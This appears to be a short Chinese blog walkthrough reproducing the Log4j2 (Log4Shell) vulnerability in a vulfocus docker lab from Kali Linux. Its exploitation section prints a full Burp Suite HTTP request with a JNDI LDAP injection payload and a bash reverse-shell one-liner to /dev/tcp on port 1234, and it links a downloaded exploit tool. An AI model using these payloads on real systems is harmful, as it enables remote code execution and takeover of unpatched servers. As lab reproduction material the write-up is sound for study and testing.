环境搭建:
本次漏洞复现采用vulfocus的log4j2靶场docker
使用Kali系统进行复现实验
搭建docker拉取漏洞镜像可参考以下链接:
/weixin_47019868/article/details/12972
log4漏洞镜像
启动环境
漏洞验证:
dnslog回显则漏洞存在
漏洞利用:
接下来利用漏洞反弹shell,这里用的是大佬的exp,百度云链接如下:
链接:/s/1ABBPDmtMQktehVBt5MYwvg 提取码:gr3n
kali攻击机启动ldap服务和http服务
burpsuite构造payload
POST /hello HTTP/1.1Host: 192.168.10.244:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/0101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 66Origin: http://192.168.10.244:8080Connection: closeReferer: http://192.168.10.244:8080/helloUpgrade-Insecure-Requests: 1cmd:/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.244/1234 0>&1'payload=${jndi:ldap://192.168.10.244:3456/TomcatBypass/TomcatEcho}
监听1234端口
发包返回200
反弹成功!!!
参考链接:
/huaflwr/p/15679365.html
/isxiaole/article/details/121912039